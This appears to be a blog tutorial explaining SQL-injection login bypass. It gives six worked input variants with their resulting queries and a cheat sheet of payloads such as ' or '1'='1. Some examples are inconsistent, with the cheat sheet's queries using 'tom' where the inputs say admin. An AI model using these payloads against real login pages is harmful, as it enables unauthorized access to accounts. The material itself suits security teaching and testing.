Helping Information

SQL Injection on Login Page

Discover 6 SQL Injection on Login Page.

In this post, we are going to learn about SQL Injection and how we test login page using SQL Injection.

Let’s dive into this. Suppose, we are testing a login page where the username and password verification is a must. Both username and password field is prone to code injection.

Sr No Username Password Status
1 admin admin ok
2 raj 12345 ok
SQL Injection
Image from Google Search

SQL Injection on Login Page

Type 1
Executed SQL query when username is admin and password is admin:

SELECT * FROM users WHERE name=’admin’ and password=’admin’

When a start login and enter the username and password on login page, a SQL query generated and executed to search on the database to verify the username and password entered by user. The above query searches in the table where username is admin and password is admin. If the entries matches in table, the user is authenticated.

To bypass this security mechanism, SQL code has to be injected on to the input fields. The SQL code has to injected in a such way that SQL Statement return us a valid result upon the execution of SQL injection code. If there is an error in the syntax, it won’t fetch a valid result. So putting random SQL commands and submitting will not always result in successful authentication on login page.

Type 2
Executed SQL query when username is admin and password is a single quote:

SELECT * FROM users WHERE name=’admin’ and password=”

The above query is not going yield any output as it is not a valid query. If the web login page is not filtering out the error message. You will be able to see an error message on the page. The trick is not the query valid by putting correct SQL commands on place.

Type 3
Executed SQL query when username is admin and password is ‘ or ‘1’=’1:

SELECT * FROM users WHERE name=’admin’ and password=” or ‘1’=’1′

If the username is already known, the only thing is to be bypassed is the password verification. So, the SQL commands should be moderated in the similar way as given above to bypass login page.

The password=”or’1’=’1′ condition is always true, so the password verification never happens. it can also be said that the above statement is more or less equal to operator.

SELECT * FROM users WHERE name=’admin’

That is just only one possibility. The actual exploit is limited only by the imagination of the tester. Let’s check out another possibility.

Type 4
Executed SQL query when username is admin and password is ‘ or 1=’1:

SELECT * FROM users WHERE name=’admin’ and password=” or 1=’1′

The password=’or 1=’1 condition is also always true just like in previous case and thus bypasses the security on login page.
The above two cases needed a valid username to be supplied. But that is not necessarily required since the username field is also vulnerable to SQL injection attacks.

Type 5
Executed SQL query when username is ‘ or ‘1’=’1 and password is ‘ or 1=’1:

SELECT * FROM users WHERE name=” or ‘1’=’1′ and password=” or ‘1’=’1′

The SQL query is crafted in a such way that both username and password verification are bypassed. The above statement actually queries for all the users in the database and thus bypasses all the security.

Type 6
Executed SQL query when username is ‘ or ‘ 1=1 and password is ‘ or ‘ 1=1:

SELECT * FROM users WHERE name=” or ‘ 1=1’ and password=” or ‘1=1’

The above query is also more and less similar to the previous query executed and is a possible way to get authenticated.

Cheat Sheet

Sr No Username Password SQL Query
1 admin admin SELECT * FROM users WHERE name='tom'and password='tom'
2 admin ' or '1'='1 SELECT * FROM users WHERE name='tom' and password='' or '1'='1'
3 admin ' or 1='1 SELECT * FROM users WHERE name='tom' and password='' or 1='1'
4 admin 1' or 1=1 -- SELECT * FROM users WHERE name='tom' and password='' or 1=1-- -'
5 ' or '1'='1 ' or '1'='1 SELECT * FROM users WHERE name='' or '1'='1' and password='' or '1'='1'
6 ' or ' 1=1 ' or ' 1=1 SELECT * FROM users WHERE name='' or ' 1=1' and password='' or ' 1=1'

Find out more interesting and amazing post on technology, ethical hacking and more Here.

Leave a Reply

Your email address will not be published. Required fields are marked *